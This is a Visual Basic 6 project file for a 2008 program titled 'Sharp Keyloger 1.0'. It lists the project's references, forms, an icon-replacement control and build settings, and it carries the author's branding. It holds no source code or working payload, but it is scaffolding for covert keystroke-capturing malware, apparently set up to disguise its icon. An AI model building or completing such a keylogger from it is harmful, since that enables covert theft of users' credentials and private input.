Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Reference=*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\..\..\..\..\WINDOWS\system32\scrrun.dll#Microsoft Scripting Runtime
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Object={68F45442-3569-11D7-90A8-00E0297F0885}#1.0#0; ReplaceIcon.ocx
Form=Form1.frm
Form=Form2.frm
ResFile32="Project1.RES"
IconForm="Form2"
Startup="Form1"
HelpFile=""
Title="Sharp Keyloger 1.0"
ExeName32="Sharp Keyloger 1.0.exe"
Command32=""
Name="Project1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="wWw.Sharp.Blogfa.cOm"
VersionCompanyName="wWw.Sharp-Soft.nEt"
VersionFileDescription="Y! ID : Sharp_h2001"
VersionLegalCopyright="2008"
VersionProductName="Sharp Keyloger 1.0"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1

[vbAdvance]
IsConsole=0
HasStubFile=0
GenerateMap=0
TSAware=0
XPManifest=0
ResBuildName=.\Project1.dll
ReplaceIcon=1
AppIconFile=..\..\..\..\..\..\Icons\Untitle 1.ico
SendCommandArgs=0
SymbDbgPref=0
RevisionVersion=0
